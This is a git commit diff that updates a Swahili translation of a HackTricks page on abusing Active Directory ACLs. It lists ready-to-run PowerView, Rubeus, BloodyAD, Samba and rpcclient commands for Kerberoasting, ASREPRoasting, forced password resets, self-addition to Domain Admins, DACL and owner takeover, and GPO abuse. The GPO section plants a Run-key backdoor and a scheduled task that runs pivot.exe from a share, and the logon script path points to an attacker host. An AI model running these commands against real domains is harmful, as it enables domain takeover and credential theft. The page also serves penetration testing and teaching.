	Translated ['src/windows-hardening/windows-local-privilege-escalation/dl
This commit is contained in:
		
							parent
							
								
									3c943c3cb0
								
							
						
					
					
						commit
						a6a06e1e91
					
				@ -238,7 +238,6 @@
 | 
			
		||||
- [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
 | 
			
		||||
  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 | 
			
		||||
  - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
 | 
			
		||||
  - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
 | 
			
		||||
  - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
 | 
			
		||||
  - [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
 | 
			
		||||
  - [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
 | 
			
		||||
 | 
			
		||||
@ -1,8 +1,8 @@
 | 
			
		||||
# Kutumia Vibaya Active Directory ACLs/ACEs
 | 
			
		||||
# Kutumia vibaya Active Directory ACLs/ACEs
 | 
			
		||||
 | 
			
		||||
{{#include ../../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala asili.**
 | 
			
		||||
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala za asili.**
 | 
			
		||||
 | 
			
		||||
## BadSuccessor
 | 
			
		||||
 | 
			
		||||
@ -13,30 +13,45 @@ BadSuccessor.md
 | 
			
		||||
 | 
			
		||||
## **Haki za GenericAll kwa Mtumiaji**
 | 
			
		||||
 | 
			
		||||
Haki hii inampa mshambuliaji udhibiti kamili wa akaunti ya mtumiaji anayelengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri ya `Get-ObjectAcl`, mshambuliaji anaweza:
 | 
			
		||||
Haki hii inampa mshambuliaji udhibiti kamili juu ya akaunti ya mtumiaji lengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri `Get-ObjectAcl`, mshambuliaji anaweza:
 | 
			
		||||
 | 
			
		||||
- **Badilisha Nenosiri la Lengo**: Kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
 | 
			
		||||
- **Targeted Kerberoasting**: Kuweka SPN kwenye akaunti ya mtumiaji ili kuiifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja hash za ticket-granting ticket (TGT).
 | 
			
		||||
- **Badilisha Nenosiri la Lengo**: Kwa kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
 | 
			
		||||
- Kutoka Linux, unaweza kufanya vivyo hivyo kwa SAMR kwa kutumia Samba `net rpc`:
 | 
			
		||||
```bash
 | 
			
		||||
# Reset target user's password over SAMR from Linux
 | 
			
		||||
net rpc password <samAccountName> '<NewPass>' -U <domain>/<user>%'<pass>' -S <dc_fqdn>
 | 
			
		||||
```
 | 
			
		||||
- **Ikiwa akaunti imezimwa, ondoa bendera ya UAC**: `GenericAll` inaruhusu kuhariri `userAccountControl`. Kutoka Linux, BloodyAD inaweza kuondoa bendera ya `ACCOUNTDISABLE`:
 | 
			
		||||
```bash
 | 
			
		||||
bloodyAD --host <dc_fqdn> -d <domain> -u <user> -p '<pass>' remove uac <samAccountName> -f ACCOUNTDISABLE
 | 
			
		||||
```
 | 
			
		||||
- **Targeted Kerberoasting**: Weka SPN kwenye akaunti ya mtumiaji ili kuifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kunyakua na kujaribu kuvunja hashes za ticket-granting ticket (TGT).
 | 
			
		||||
```bash
 | 
			
		||||
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
 | 
			
		||||
.\Rubeus.exe kerberoast /user:<username> /nowrap
 | 
			
		||||
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
 | 
			
		||||
```
 | 
			
		||||
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe hatarini kwa ASREPRoasting.
 | 
			
		||||
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, na kufanya akaunti yao kuwa nyeti kwa ASREPRoasting.
 | 
			
		||||
```bash
 | 
			
		||||
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
 | 
			
		||||
```
 | 
			
		||||
- **Shadow Credentials / Key Credential Link**: Kwa `GenericAll` kwenye mtumiaji unaweza kuongeza uthibitisho unaotegemea cheti na kuingia kama wao bila kubadilisha nenosiri lao. Tazama:
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
shadow-credentials.md
 | 
			
		||||
{{#endref}}
 | 
			
		||||
 | 
			
		||||
## **Haki za GenericAll kwenye Kundi**
 | 
			
		||||
 | 
			
		||||
Haki hii inamwezesha mshambuliaji kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
 | 
			
		||||
Haki hii inamruhusu mshambuliaji kudhibiti uanachama wa kundi ikiwa wana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kubaini distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
 | 
			
		||||
 | 
			
		||||
- **Kujiongeza kwenye kundi la `Domain Admins`**: Hii inaweza kufanywa kupitia amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
 | 
			
		||||
- **Add Themselves to the Domain Admins Group**: Hii inaweza kufanywa kwa amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
 | 
			
		||||
```bash
 | 
			
		||||
net group "domain admins" spotless /add /domain
 | 
			
		||||
Add-ADGroupMember -Identity "domain admins" -Members spotless
 | 
			
		||||
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
 | 
			
		||||
```
 | 
			
		||||
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote endapo una uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limejumuishwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
 | 
			
		||||
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote pale unapokuwa na uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limewekwa ndani ya “Remote Management Users”, utaipata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
 | 
			
		||||
```bash
 | 
			
		||||
# Linux tooling example (BloodyAD) to add yourself to a target group
 | 
			
		||||
bloodyAD --host <dc-fqdn> -d <domain> -u <user> -p '<pass>' add groupMember "<Target Group>" <user>
 | 
			
		||||
@ -46,35 +61,35 @@ netexec winrm <dc-fqdn> -u <user> -p '<pass>'
 | 
			
		||||
```
 | 
			
		||||
## **GenericAll / GenericWrite / Write on Computer/User**
 | 
			
		||||
 | 
			
		||||
Kuwa na ruhusa hizi kwenye kitu cha kompyuta au akaunti ya mtumiaji kunaruhusu:
 | 
			
		||||
Kuwa na vibali hivi kwenye objekti ya kompyuta au kwenye akaunti ya mtumiaji kunaruhusu:
 | 
			
		||||
 | 
			
		||||
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa kitu cha kompyuta.
 | 
			
		||||
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia ruhusa kuunda shadow credentials.
 | 
			
		||||
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa objekti ya kompyuta.
 | 
			
		||||
- **Shadow Credentials**: Tumia mbinu hii kuiga objekti ya kompyuta au akaunti ya mtumiaji kwa kutumia vibali kuunda shadow credentials.
 | 
			
		||||
 | 
			
		||||
## **WriteProperty on Group**
 | 
			
		||||
 | 
			
		||||
Ikiwa mtumiaji ana haki za `WriteProperty` kwenye vitu vyote vya kikundi fulani (mfano, `Domain Admins`), wanaweza:
 | 
			
		||||
Ikiwa mtumiaji ana haki za `WriteProperty` kwa vitu vyote vya kundi fulani (kwa mfano, `Domain Admins`), wanaweza:
 | 
			
		||||
 | 
			
		||||
- **Kujiongeza kwenye kikundi la Domain Admins**: Inaweza kufikiwa kwa kuchanganya amri za `net user` na `Add-NetGroupUser`; mbinu hii inaruhusu kupandisha hadhi ya ruhusa ndani ya domain.
 | 
			
		||||
- **Kujiongezea kwenye Domain Admins Group**: Inayowezekana kwa kuchanganya amri za `net user` na `Add-NetGroupUser`, mbinu hii inaruhusu privilege escalation ndani ya domain.
 | 
			
		||||
```bash
 | 
			
		||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 | 
			
		||||
```
 | 
			
		||||
## **Self (Self-Membership) on Group**
 | 
			
		||||
 | 
			
		||||
Haki hii inawawezesha washambuliaji kujiongeza wenyewe kwa vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongeza mwenyewe:
 | 
			
		||||
Idhini hii inawawezesha washambuliaji kujiongezea kwenye makundi maalum, kama `Domain Admins`, kwa kutumia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfuatano wa amri ufuatao kunaruhusu kujiongezea:
 | 
			
		||||
```bash
 | 
			
		||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
 | 
			
		||||
```
 | 
			
		||||
## **WriteProperty (Self-Membership)**
 | 
			
		||||
 | 
			
		||||
Haki inayofanana, hii inawawezesha washambuliaji kujiongeza moja kwa moja kwenye vikundi kwa kubadilisha sifa za kikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa na:
 | 
			
		||||
Haki inayofanana, hii inawawezesha washambuliaji kujiunga moja kwa moja na vikundi kwa kubadilisha mali za vikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa kwa:
 | 
			
		||||
```bash
 | 
			
		||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
 | 
			
		||||
net group "domain admins" spotless /add /domain
 | 
			
		||||
```
 | 
			
		||||
## **ForceChangePassword**
 | 
			
		||||
 | 
			
		||||
Kushikilia `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu kuweka nywila upya bila kujua nywila ya sasa. Uhakiki wa haki hii na exploitation yake yanaweza kufanywa kupitia PowerShell au zana nyingine za mstari wa amri, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikijumuisha interactive sessions na one-liners kwa mazingira yasiyo ya kuingiliana. Amri zinaanzia kutoka miito rahisi za PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionyesha utofauti wa attack vectors.
 | 
			
		||||
Kushikilia `ExtendedRight` kwa mtumiaji kwa ajili ya `User-Force-Change-Password` kunaruhusu kuweka upya nywila bila kujua nywila ya sasa. Uhakiki wa haki hii na matumizi yake unaweza kufanywa kupitia PowerShell au zana nyingine za command-line, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikiwa ni pamoja na interactive sessions na one-liners kwa mazingira yasiyo na mwingiliano. Amri zinatofautiana kutoka kwa miito rahisi za PowerShell hadi matumizi ya `rpcclient` kwenye Linux, zikionesha utofauti wa attack vectors.
 | 
			
		||||
```bash
 | 
			
		||||
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
 | 
			
		||||
Set-DomainUserPassword -Identity delegate -Verbose
 | 
			
		||||
@ -85,23 +100,23 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
 | 
			
		||||
rpcclient -U KnownUsername 10.10.10.192
 | 
			
		||||
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
 | 
			
		||||
```
 | 
			
		||||
## **WriteOwner kwenye kikundi**
 | 
			
		||||
## **WriteOwner kwenye Kundi**
 | 
			
		||||
 | 
			
		||||
Iwapo mshambuliaji atagundua kwamba ana haki za `WriteOwner` kwa kikundi, anaweza kubadilisha umiliki wa kikundi kwa ajili yake mwenyewe. Hii ina athari kubwa hasa wakati kikundi kinachohusika ni `Domain Admins`, kwa kuwa kubadilisha umiliki kunaruhusu udhibiti mpana wa sifa za kikundi na uanachama. Mchakato unajumuisha kutambua kitu sahihi kwa kutumia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
 | 
			
		||||
Ikiwa mshambulizi anagundua kuwa ana haki za `WriteOwner` juu ya kundi, anaweza kubadilisha umiliki wa kundi kwao. Hii ina athari kubwa hasa wakati kundi husika ni `Domain Admins`, kwani kubadilisha umiliki kunaruhusu udhibiti mpana zaidi juu ya sifa za kundi na uanachama. Mchakato unajumuisha kubaini kitu sahihi kupitia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
 | 
			
		||||
```bash
 | 
			
		||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
 | 
			
		||||
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
 | 
			
		||||
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
 | 
			
		||||
```
 | 
			
		||||
## **GenericWrite kwa User**
 | 
			
		||||
## **GenericWrite on Mtumiaji**
 | 
			
		||||
 | 
			
		||||
Ruhusa hii inamruhusu attacker kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, attacker anaweza kubadilisha njia ya logon script ya User ili kuendesha script hasidi wakati User anapofanya logon. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha mali ya `scriptpath` ya User lengwa ili kuonyesha kwenye script ya attacker.
 | 
			
		||||
Ruhusa hii inaruhusu mshambuliaji kurekebisha sifa za mtumiaji. Hasa, kwa ufikiaji wa `GenericWrite`, mshambuliaji anaweza kubadilisha njia ya logon script ya mtumiaji ili kuendesha script yenye madhara wakati mtumiaji anapoingia. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha sifa ya `scriptpath` ya mtumiaji lengwa ili kuelekeza kwenye script ya mshambuliaji.
 | 
			
		||||
```bash
 | 
			
		||||
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
 | 
			
		||||
```
 | 
			
		||||
## **GenericWrite on Group**
 | 
			
		||||
 | 
			
		||||
Kwa ruhusa hii, wadukuzi wanaweza kubadili uanachama wa group, kama vile kujiongezea wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unajumuisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwenye group, na kuthibitisha mabadiliko ya uanachama kwa amri za PowerShell.
 | 
			
		||||
Kwa kibali hiki, washambuliaji wanaweza kubadilisha uanachama wa vikundi, kama kuongeza wao wenyewe au watumiaji wengine kwenye vikundi maalum. Mchakato huu unahusisha kuunda credential object (kitu cha cheti), kuitumia kuongeza au kuondoa watumiaji kutoka kwenye kikundi, na kuthibitisha mabadiliko ya uanachama kwa kutumia amri za PowerShell.
 | 
			
		||||
```bash
 | 
			
		||||
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
 | 
			
		||||
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
 | 
			
		||||
@ -109,11 +124,16 @@ Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'userna
 | 
			
		||||
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
 | 
			
		||||
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
 | 
			
		||||
```
 | 
			
		||||
- Kutoka Linux, Samba `net` inaweza kuongeza/kuondoa wanachama ukiwa na `GenericWrite` kwenye kundi (inayofaa wakati PowerShell/RSAT hazipatikani):
 | 
			
		||||
```bash
 | 
			
		||||
# Add yourself to the target group via SAMR
 | 
			
		||||
net rpc group addmem "<Group Name>" <user> -U <domain>/<user>%'<pass>' -S <dc_fqdn>
 | 
			
		||||
# Verify current members
 | 
			
		||||
net rpc group members "<Group Name>" -U <domain>/<user>%'<pass>' -S <dc_fqdn>
 | 
			
		||||
```
 | 
			
		||||
## **WriteDACL + WriteOwner**
 | 
			
		||||
 | 
			
		||||
Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha attacker kujipa ruhusa za `GenericAll` juu ya kitu hicho.  
 | 
			
		||||
 | 
			
		||||
Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo vinavyopo unapo jaribu exploit ruhusa hizi kwa kutumia Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
 | 
			
		||||
Kuwa mmiliki wa objekti ya AD na kuwa na ruhusa za `WriteDACL` juu yake humuwezesha mshambuliaji kujipa ruhusa za `GenericAll` kwa objekti hiyo. Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa objekti na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo linapojaribu exploit ruhusa hizi kwa kutumia moduli ya Active Directory `Set-Acl` / `Get-Acl` cmdlets.
 | 
			
		||||
```bash
 | 
			
		||||
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
 | 
			
		||||
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
 | 
			
		||||
@ -121,66 +141,139 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
 | 
			
		||||
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
 | 
			
		||||
$ADSI.psbase.commitchanges()
 | 
			
		||||
```
 | 
			
		||||
## **Kurudishana kwenye Domain (DCSync)**
 | 
			
		||||
### WriteDACL/WriteOwner uchukuzi wa haraka (PowerView)
 | 
			
		||||
 | 
			
		||||
Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujigania kuwa Domain Controller na kusawazisha data, pamoja na kredenshiali za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kutoa taarifa nyeti kutoka kwa mazingira ya AD bila kupata ufikiaji wa moja kwa moja kwenye Domain Controller. [**Jifunze zaidi kuhusu shambulio la DCSync hapa.**](../dcsync.md)
 | 
			
		||||
Unapokuwa na `WriteOwner` na `WriteDacl` juu ya akaunti ya mtumiaji au akaunti ya huduma, unaweza kuchukua udhibiti kamili na kuweka upya nenosiri lake kwa kutumia PowerView bila kujua nenosiri la zamani:
 | 
			
		||||
```powershell
 | 
			
		||||
# Load PowerView
 | 
			
		||||
. .\PowerView.ps1
 | 
			
		||||
 | 
			
		||||
# Grant yourself full control over the target object (adds GenericAll in the DACL)
 | 
			
		||||
Add-DomainObjectAcl -Rights All -TargetIdentity <TargetUserOrDN> -PrincipalIdentity <YouOrYourGroup> -Verbose
 | 
			
		||||
 | 
			
		||||
# Set a new password for the target principal
 | 
			
		||||
$cred = ConvertTo-SecureString 'P@ssw0rd!2025#' -AsPlainText -Force
 | 
			
		||||
Set-DomainUserPassword -Identity <TargetUser> -AccountPassword $cred -Verbose
 | 
			
		||||
```
 | 
			
		||||
Vidokezo:
 | 
			
		||||
- Unaweza kuhitaji kwanza kubadilisha mmiliki kuwa wewe ikiwa una `WriteOwner` tu:
 | 
			
		||||
```powershell
 | 
			
		||||
Set-DomainObjectOwner -Identity <TargetUser> -OwnerIdentity <You>
 | 
			
		||||
```
 | 
			
		||||
- Thibitisha upatikanaji kwa kutumia itifaki yoyote (SMB/LDAP/RDP/WinRM) baada ya kuweka upya nenosiri.
 | 
			
		||||
 | 
			
		||||
## **Replikesheni kwenye Domain (DCSync)**
 | 
			
		||||
 | 
			
		||||
Shambulio la DCSync linatumia ruhusa maalumu za replikesheni kwenye domain kuiga Domain Controller na kusawazisha data, ikiwa ni pamoja na cheti/nenosiri za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kunyakua taarifa nyeti kutoka mazingira ya AD bila kupata moja kwa moja Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md)
 | 
			
		||||
 | 
			
		||||
## Ugawaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>
 | 
			
		||||
 | 
			
		||||
### Ugawaji wa GPO
 | 
			
		||||
 | 
			
		||||
Ufikiaji uliogawiwa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyobainika kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 | 
			
		||||
Upatikanaji uliogawanywa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyoonekana kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 | 
			
		||||
 | 
			
		||||
### Kuorodhesha Vibali vya GPO
 | 
			
		||||
### Orodhesha Vibali vya GPO
 | 
			
		||||
 | 
			
		||||
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji maalum ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 | 
			
		||||
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji fulani ana ruhusa za kuzisimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
 | 
			
		||||
 | 
			
		||||
**Kompyuta zilizo na Sera Imetumika**: Inawezekana kubaini kompyuta ambazo GPO fulani inatumika, kusaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
 | 
			
		||||
**Kompyuta Zenye Sera Imetumika**: Inawezekana kubaini ni kompyuta zipi Sera fulani inatumika nazo, ikisaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
 | 
			
		||||
 | 
			
		||||
**Sera Zilizotumika kwa Kompyuta Fulani**: Ili kuona ni sera gani zilizotumika kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.
 | 
			
		||||
**Sera Zinazotumika kwa Kompyuta Iliyotajwa**: Ili kuona sera zinazotumika kwa kompyuta maalumu, amri kama `Get-DomainGPO` zinaweza kutumika.
 | 
			
		||||
 | 
			
		||||
**OUs zilizo na Sera Iliyotumika**: Kutambua vitengo vya shirika (OUs) vilivyoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.
 | 
			
		||||
**OUs Zenye Sera Imetumika**: Kutambua organizational units (OUs) zilizoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.
 | 
			
		||||
 | 
			
		||||
Unaweza pia kutumia zana [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPOs na kupata matatizo ndani yao.
 | 
			
		||||
 | 
			
		||||
### Kutumia Vibaya GPO - New-GPOImmediateTask
 | 
			
		||||
 | 
			
		||||
GPOs zilizo sanidiwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda kazi ya ratiba inayotekelezwa mara moja. Hii inaweza kutumika kuongeza mtumiaji kwenye kikundi cha local administrators kwenye mashine zilizoathiriwa, na hivyo kuongeza kwa kiasi kikubwa viwango vya ruhusa:
 | 
			
		||||
GPOs zilizo na usanidi mbaya zinaweza kutumika kusababisha utekelezaji wa code, kwa mfano, kwa kuunda task ya scheduled inayotekelezwa mara moja. Hii inaweza kutumiwa kuongeza mtumiaji kwenye kundi la local administrators kwenye mashine zilizoathiriwa, na hivyo kuinua vibali kwa kiasi kikubwa:
 | 
			
		||||
```bash
 | 
			
		||||
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
 | 
			
		||||
```
 | 
			
		||||
### GroupPolicy module - Abuse GPO
 | 
			
		||||
 | 
			
		||||
The GroupPolicy module, ikiwa imewekwa, inaruhusu uundaji na kuunganisha GPOs mpya, pamoja na kuweka mapendeleo kama registry values ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Mbinu hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
 | 
			
		||||
The GroupPolicy module, ikiwa imewekwa, inaruhusu kuunda na kuunganisha GPOs mpya, na kuweka preferences kama registry values ili kuendesha backdoors kwenye kompyuta zilizoathiriwa. Njia hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
 | 
			
		||||
```bash
 | 
			
		||||
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
 | 
			
		||||
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
 | 
			
		||||
```
 | 
			
		||||
### SharpGPOAbuse - Abuse GPO
 | 
			
		||||
 | 
			
		||||
SharpGPOAbuse inatoa njia ya abuse GPOs zilizopo kwa kuongeza tasks au kubadilisha settings bila hitaji la kuunda GPOs mpya. Zana hii inahitaji uhariri wa GPOs zilizopo au kutumia RSAT tools kuunda GPOs mpya kabla ya kutekeleza mabadiliko:
 | 
			
		||||
SharpGPOAbuse hutoa njia ya kutumia kwa mbaya GPOs zilizopo kwa kuongeza kazi au kubadilisha mipangilio bila hitaji la kuunda GPOs mpya. Zana hii inahitaji mabadiliko ya GPOs zilizopo au kutumia RSAT kuunda mpya kabla ya kutekeleza mabadiliko:
 | 
			
		||||
```bash
 | 
			
		||||
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
 | 
			
		||||
```
 | 
			
		||||
### Leteza Sasisho la Sera
 | 
			
		||||
### Lazimisha Sasisho la Sera
 | 
			
		||||
 | 
			
		||||
Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, agizo `gpupdate /force` linaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Agizo hili linahakikisha kuwa marekebisho yoyote ya GPOs yatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki.
 | 
			
		||||
Mabadiliko ya GPO kwa kawaida hufanyika kila takriban dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kufanya mabadiliko, amri `gpupdate /force` inaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Amri hii inahakikisha kwamba mabadiliko yoyote kwenye GPOs yanatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki ufuatao.
 | 
			
		||||
 | 
			
		||||
### Ndani ya Mfumo
 | 
			
